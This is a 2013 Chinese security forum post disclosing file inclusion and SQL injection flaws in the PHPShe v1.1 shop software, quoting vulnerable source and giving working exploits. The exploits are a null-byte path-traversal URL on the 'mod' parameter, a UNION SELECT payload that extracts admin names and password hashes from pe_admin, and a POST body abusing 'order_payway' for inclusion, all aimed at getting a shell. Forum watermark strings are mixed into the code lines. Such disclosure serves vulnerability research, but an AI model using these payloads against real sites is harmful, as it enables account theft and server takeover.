找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2217|回复: 0
打印 上一主题 下一主题

phpshe v1.1多处SQL注入和文件包含漏洞Getshell

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-16 16:45:03 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
/*******************************************************/' K1 S2 D+ ^) K
/* Phpshe v1.1 Vulnerability+ j0 _0 P9 o8 [7 z
/* ========================1 Z/ r; X  ?, O8 c9 n
/* By: : Kn1f37 y& A4 _0 b- c0 e& v
/* E-Mail : 681796@qq.com
, ]: g) A( b2 q% j6 n. t" `/*******************************************************/: g2 z: `' W2 o4 F8 X
0×00 整体大概参数传输
; E) U: ]; G/ |& C" L4 N; C / n7 k& }1 }8 R! k% p5 ~0 S
  [9 s8 }) V. X

, R0 v- `, ^% R' V2 U# n4 c: \//common.php1 i: }' k- d4 ?2 d6 X
if (get_magic_quotes_gpc()) {
) j' b( X8 D& z9 G/ t% H# F!empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');
$ O# y0 B: v; U6 G( r1 O% I( U!empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');/ V0 E& P- j( O: A' [  d* }- A3 G2 E8 I
}
8 Z% m4 C/ T* q/ p, celse {
4 d+ C3 |- o: `; v7 b! ^1 O4 p/ V# ?: i!empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');
1 r! A( i+ `! i+ c!empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');# {: Q( D7 v  f; A( H  I. x
}
8 S4 w0 }- Q, R. g3 H9 M  Fsession_start();% O/ n2 `6 ^  T) m. t. G, y0 {; o
!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');
% r( p0 C. J6 r! Y2 I6 _1 s!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');, S8 @2 }. H5 N& E( N' g
3 |, ~! G. W. H7 k/ N7 O# S
0×01 包含漏洞4 j  v7 j1 Y/ [* C+ j" P
7 K  v+ I# I  ^8 _. t! h
; x+ j0 s& f2 o5 e# y6 n
//首页文件- D$ {; s( {  w' F8 t( i/ X; t" e7 z
<!--?php include('common.php'); $cache_category = cache::get('category'); $cache_category_arr = cache::get('category_arr'); $cache_class = cache::get('class'); $cache_ad = cache::get('ad'); $cache_link = cache::get('link'); $cache_page = cache::get('page'); $web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array(); $cart_num = pe_login('user') ? $db--->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);. u( X; H2 c9 ]- \! r* E# F: y
include("{$pe['path_root']}module/{$module}/{$mod}.php");  //$mod可控造成“鸡肋”包含漏洞8 J% f) p& J" E
pe_result();, h- E1 N: O3 a0 H+ c% D
?>: y- m2 F- q/ f3 o: n3 f" X
//common 文件 第15行开始
5 h" ]; s. R1 i" y8 I( y! B% ?url路由配置. Y+ w$ y! `. M
$module = $mod = $act = 'index';
3 ~. B8 r) E( Y3 |' @$ v$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);, V9 E7 N9 i/ W5 l* ?
$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);- e- V6 r. i+ e5 P1 a, `  e4 e
$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);
( v6 I9 \" v9 G, j: V7 S# ~2 U9 `//exp:http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%002 c2 |9 {3 N8 {: {- _. {6 w" U


) i0 l2 o' `( t4 { : f" I9 @: k3 R: A  q# s% H4 E
0×02 搜索注入" x3 f& }4 Y' O0 o& R
" o" c  e! \) X" u: u0 Y3 e
<code id="code2">

//product.php文件1 n' G- ^2 U# b$ j
case 'list':
9 W* l5 @% {6 z$category_id = intval($id);  N2 U& Q/ }+ h# m3 x
$info = $db->pe_select('category', array('category_id'=>$category_id));- u5 O1 x7 Z% C- Z$ b$ j
//搜索7 U, \3 p  b' n& ]7 S8 a5 u
$sqlwhere = " and `product_state` = 1";
- K% a4 M! \, c) A7 o5 a6 {9 Bpe_lead('hook/category.hook.php');
2 \4 h! b7 i. \! H0 a) {if ($category_id) {
4 f; v1 W1 q: `8 ]3 U% c& Rwhere .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";; L+ o/ b* z3 i$ M1 Z; R5 o) J
}
) z6 r6 ]& T9 ?4 {8 b7 Q$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤9 ]3 h. w  U1 z. B' u  }. L
if ($_g_orderby) {1 U$ ^* [/ s  w; U1 M5 R! B
$orderby = explode('_', $_g_orderby);% b- z0 ^* ^0 ^4 r
$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";
, P8 [- x+ W7 j2 [1 Y5 ]! B4 e}
! k" n/ A0 g- n# X# D' lelse {
' n2 m# J5 K8 _; {% z$sqlwhere .= " order by `product_id` desc";
- {5 o* d! m/ ]" s/ }& D}+ O* a' E0 z0 ?
$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));
( o. m) v) p, c+ ]# t( {; T8 }//热卖排行
* ^" m0 W; ~1 B5 x: C+ X; ?1 k$product_hotlist = product_hotlist();
) E" Q& ~7 \5 K# u( t$ E//当前路径
0 ]4 ?. c) G0 ~, C$nowpath = category_path($category_id);
, f4 f) u. Z* [; P$seo = pe_seo($info['category_name']);! z* L5 X1 e0 u- o* B2 F
include(pe_tpl('product_list.html'));
7 C1 i# [, s, Z% w# L5 P//跟进selectall函数库
1 m& P, Y) b! [0 D6 B5 @public function pe_selectall($table, $where = '', $field = '*', $limit_page = array())( _. P$ `4 K, _8 p' ?+ S
{3 x- b4 V% f8 b
//处理条件语句
  A3 b$ k* P4 P1 U$sqlwhere = $this->_dowhere($where);# b" p2 L" I( Q% E- D! x$ E' Z
return $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);" o2 d& z! O: D) H
}
4 H3 w+ H/ n# u0 F//exp. u4 F1 i4 B$ f$ [
product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='12 [, s& L8 y2 P2 `! J8 Y

</code>1 y, c$ d4 F8 `5 D
+ D5 G, ~: g: T7 v5 m  I0 D
0×03 包含漏洞2, G9 U6 q% }3 j3 N$ K
9 Z" [* v2 U+ U. u
<code id="code3">

//order.php

case 'pay':


( W; L" j5 M5 N. Y. c+ }8 @$order_id = pe_dbhold($_g_id);

, |. B8 B- k2 G1 U# F; j0 _0 n
$cache_payway = cache::get('payway');

! d6 W( z' V: G5 V
foreach($cache_payway as $k => $v) {

5 f* x6 L; T" I+ @( Y# H0 v
$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);


9 i! R. H% S6 Q. L* ~1 w: |if ($k == 'bank') {

. F* F9 @6 s# f) r% h
$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);

) W. v1 e3 P* ]0 ?, s
}

( r  y- U" A8 G* ^  P
}


- b3 e. c& l# D1 w0 J$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));

& S, M1 M" H! e0 n8 H9 c( D2 h
!$order['order_id'] && pe_error('订单号错误...');

6 M- l6 }' Y+ C! J: L1 g$ Y
if (isset($_p_pesubmit)) {

* }3 v& T1 v4 d4 ~- n/ Y
if ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {


; ]" l6 K! S" u7 s- ?7 \3 k$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));

7 @! L1 M, b( @& u  n2 @" U
foreach ($info_list as $v) {

6 s% x; x+ [" d% [
$order['order_name'] .= "{$v['product_name']};";& f1 h9 f* o! m& h& @1 g

0 ]  o, _9 C, B2 D% q( _8 G4 f
}

1 D. a' x0 P2 N- a' a
echo '正在为您连接支付网站,请稍后...';


3 [  s* X# m: iinclude("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");

- Q" {; a( q; ~% `, g7 h3 c9 i
}//当一切准备好的时候就可以进行"鸡肋包含了"

. X- Q0 H0 F6 D; N. j; Y" ^
else {


% Z8 E- t+ h8 V. c3 npe_error('支付错误...');


" O- V0 U* e# e  x}

) z4 }, u* R6 s$ f* I2 d7 a8 L: R, o
}


7 I, W- x8 e" u9 ?2 p/ }$seo = pe_seo('选择支付方式');


( U: {0 l/ ~6 o! X- ^$ Qinclude(pe_tpl('order_pay.html'));


9 Z# v: `9 G4 G* p+ P$ n, bbreak;

}

//exp:

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>
1 C. v. i9 Z) z# e5 Thttp://www.myhack58.com/Article/UploadPic/2013-4/20134161293183866.jpg

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表